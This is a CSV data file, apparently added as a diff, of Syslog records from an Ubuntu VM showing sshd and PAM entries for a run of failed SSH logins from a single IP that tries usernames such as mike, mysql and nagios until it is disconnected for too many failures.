+2804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:33,UbuntuDevEnv,2019-06-28 05:21:32,auth,UbuntuDevEnv,info,Invalid user mike from 193.201.224.232 port 16460,94609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mike,193.201.224.2,16460,,
+2805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:33,UbuntuDevEnv,2019-06-28 05:21:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:33,UbuntuDevEnv,2019-06-28 05:21:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:35,UbuntuDevEnv,2019-06-28 05:21:35,auth,UbuntuDevEnv,info,Failed password for invalid user mike from 193.201.224.232 port 16460 ssh2,94609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mike,193.201.224.2,16460,,
+2808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:35,UbuntuDevEnv,2019-06-28 05:21:35,auth,UbuntuDevEnv,info,"Disconnecting invalid user mike 193.201.224.232 port 16460: Change of username or service not allowed: (mike,ssh-connection) -> (monitor,ssh-connection) [preauth]",94609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mike,193.201.224.2,16460,,
+2809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:36,UbuntuDevEnv,2019-06-28 05:21:36,auth,UbuntuDevEnv,info,Invalid user monitor from 193.201.224.232 port 19922,94621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,monitor,193.201.224.2,19922,,
+2810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:37,UbuntuDevEnv,2019-06-28 05:21:36,auth,UbuntuDevEnv,info,Failed none for invalid user monitor from 193.201.224.232 port 19922 ssh2,94621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,monitor,193.201.224.2,19922,,
+2811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:37,UbuntuDevEnv,2019-06-28 05:21:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:37,UbuntuDevEnv,2019-06-28 05:21:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:39,UbuntuDevEnv,2019-06-28 05:21:39,auth,UbuntuDevEnv,info,Failed password for invalid user monitor from 193.201.224.232 port 19922 ssh2,94621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,monitor,193.201.224.2,19922,,
+2814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:39,UbuntuDevEnv,2019-06-28 05:21:39,auth,UbuntuDevEnv,info,"Disconnecting invalid user monitor 193.201.224.232 port 19922: Change of username or service not allowed: (monitor,ssh-connection) -> (mother,ssh-connection) [preauth]",94621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,monitor,193.201.224.2,19922,,
+2815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:40,UbuntuDevEnv,2019-06-28 05:21:39,auth,UbuntuDevEnv,info,Invalid user mother from 193.201.224.232 port 24900,94640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mother,193.201.224.2,24900,,
+2816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:40,UbuntuDevEnv,2019-06-28 05:21:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:40,UbuntuDevEnv,2019-06-28 05:21:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:41,UbuntuDevEnv,2019-06-28 05:21:41,auth,UbuntuDevEnv,info,Failed password for invalid user mother from 193.201.224.232 port 24900 ssh2,94640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mother,193.201.224.2,24900,,
+2819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:41,UbuntuDevEnv,2019-06-28 05:21:41,auth,UbuntuDevEnv,info,"Disconnecting invalid user mother 193.201.224.232 port 24900: Change of username or service not allowed: (mother,ssh-connection) -> (mtch,ssh-connection) [preauth]",94640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mother,193.201.224.2,24900,,
+2820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:42,UbuntuDevEnv,2019-06-28 05:21:42,auth,UbuntuDevEnv,info,Invalid user mtch from 193.201.224.232 port 26962,94647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mtch,193.201.224.2,26962,,
+2821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:44,UbuntuDevEnv,2019-06-28 05:21:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:44,UbuntuDevEnv,2019-06-28 05:21:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:46,UbuntuDevEnv,2019-06-28 05:21:46,auth,UbuntuDevEnv,info,Failed password for invalid user mtch from 193.201.224.232 port 26962 ssh2,94647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mtch,193.201.224.2,26962,,
+2824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:48,UbuntuDevEnv,2019-06-28 05:21:48,auth,UbuntuDevEnv,info,"Disconnecting invalid user mtch 193.201.224.232 port 26962: Change of username or service not allowed: (mtch,ssh-connection) -> (mtcl,ssh-connection) [preauth]",94647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mtch,193.201.224.2,26962,,
+2825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:49,UbuntuDevEnv,2019-06-28 05:21:49,auth,UbuntuDevEnv,info,Invalid user mtcl from 193.201.224.232 port 60050,94673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mtcl,193.201.224.2,60050,,
+2826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:49,UbuntuDevEnv,2019-06-28 05:21:49,auth,UbuntuDevEnv,info,Failed none for invalid user mtcl from 193.201.224.232 port 60050 ssh2,94673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mtcl,193.201.224.2,60050,,
+2827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:49,UbuntuDevEnv,2019-06-28 05:21:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:49,UbuntuDevEnv,2019-06-28 05:21:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:51,UbuntuDevEnv,2019-06-28 05:21:51,auth,UbuntuDevEnv,info,Failed password for invalid user mtcl from 193.201.224.232 port 60050 ssh2,94673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mtcl,193.201.224.2,60050,,
+2830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:52,UbuntuDevEnv,2019-06-28 05:21:51,auth,UbuntuDevEnv,info,"Disconnecting invalid user mtcl 193.201.224.232 port 60050: Change of username or service not allowed: (mtcl,ssh-connection) -> (mysql,ssh-connection) [preauth]",94673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mtcl,193.201.224.2,60050,,
+2831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:53,UbuntuDevEnv,2019-06-28 05:21:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=mysql,94686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql,193.201.224.2,,0,
+2832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:56,UbuntuDevEnv,2019-06-28 05:21:55,auth,UbuntuDevEnv,info,Failed password for mysql from 193.201.224.232 port 63458 ssh2,94686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,63458,,
+2833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:58,UbuntuDevEnv,2019-06-28 05:21:58,auth,UbuntuDevEnv,info,"Disconnecting authenticating user mysql 193.201.224.232 port 63458: Change of username or service not allowed: (mysql,ssh-connection) -> (naadmin,ssh-connection) [preauth]",94686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mysql,193.201.224.2,63458,,
+2834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:58,UbuntuDevEnv,2019-06-28 05:21:58,auth,UbuntuDevEnv,info,Failed password for mysql from 193.201.224.232 port 63458 ssh2,94686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,63458,,
+2835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:21:58,UbuntuDevEnv,2019-06-28 05:21:58,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=mysql,94686,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql,193.201.224.2,,0,
+2836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:00,UbuntuDevEnv,2019-06-28 05:22:00,auth,UbuntuDevEnv,info,Invalid user naadmin from 193.201.224.232 port 30778,94712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,naadmin,193.201.224.2,30778,,
+2837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:01,UbuntuDevEnv,2019-06-28 05:22:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:01,UbuntuDevEnv,2019-06-28 05:22:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:03,UbuntuDevEnv,2019-06-28 05:22:02,auth,UbuntuDevEnv,info,Failed password for invalid user naadmin from 193.201.224.232 port 30778 ssh2,94712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,naadmin,193.201.224.2,30778,,
+2840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:03,UbuntuDevEnv,2019-06-28 05:22:02,auth,UbuntuDevEnv,info,"Disconnecting invalid user naadmin 193.201.224.232 port 30778: Change of username or service not allowed: (naadmin,ssh-connection) -> (nagios,ssh-connection) [preauth]",94712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,naadmin,193.201.224.2,30778,,
+2841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:05,UbuntuDevEnv,2019-06-28 05:22:05,auth,UbuntuDevEnv,info,Invalid user nagios from 193.201.224.232 port 38487,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,38487,,
+2842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:06,UbuntuDevEnv,2019-06-28 05:22:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:06,UbuntuDevEnv,2019-06-28 05:22:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:08,UbuntuDevEnv,2019-06-28 05:22:07,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 193.201.224.232 port 38487 ssh2,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,38487,,
+2845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:08,UbuntuDevEnv,2019-06-28 05:22:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:10,UbuntuDevEnv,2019-06-28 05:22:10,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 193.201.224.232 port 38487 ssh2,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,38487,,
+2847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:10,UbuntuDevEnv,2019-06-28 05:22:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:12,UbuntuDevEnv,2019-06-28 05:22:12,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 193.201.224.232 port 38487 ssh2,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,38487,,
+2849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:12,UbuntuDevEnv,2019-06-28 05:22:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:14,UbuntuDevEnv,2019-06-28 05:22:14,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 193.201.224.232 port 38487 ssh2,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,38487,,
+2851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:14,UbuntuDevEnv,2019-06-28 05:22:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:16,UbuntuDevEnv,2019-06-28 05:22:16,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 193.201.224.232 port 38487 ssh2,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,38487,,
+2853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:18,UbuntuDevEnv,2019-06-28 05:22:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:20,UbuntuDevEnv,2019-06-28 05:22:19,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user nagios from 193.201.224.232 port 38487 ssh2 [preauth],94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,38487,,
+2855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:20,UbuntuDevEnv,2019-06-28 05:22:19,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 193.201.224.232 port 38487 ssh2,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,38487,,
+2856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:20,UbuntuDevEnv,2019-06-28 05:22:19,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:20,UbuntuDevEnv,2019-06-28 05:22:19,auth,UbuntuDevEnv,info,Disconnecting invalid user nagios 193.201.224.232 port 38487: Too many authentication failures [preauth],94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,38487,,
+2858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:20,UbuntuDevEnv,2019-06-28 05:22:19,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:21,UbuntuDevEnv,2019-06-28 05:22:20,auth,UbuntuDevEnv,info,Invalid user nagios from 193.201.224.232 port 18203,94783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,18203,,
+2860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:21,UbuntuDevEnv,2019-06-28 05:22:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:21,UbuntuDevEnv,2019-06-28 05:22:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:22:23,UbuntuDevEnv,2019-06-28 05:22:22,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 193.201.224.232 port 18203 ssh2,94783,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,193.201.224.2,18203,,
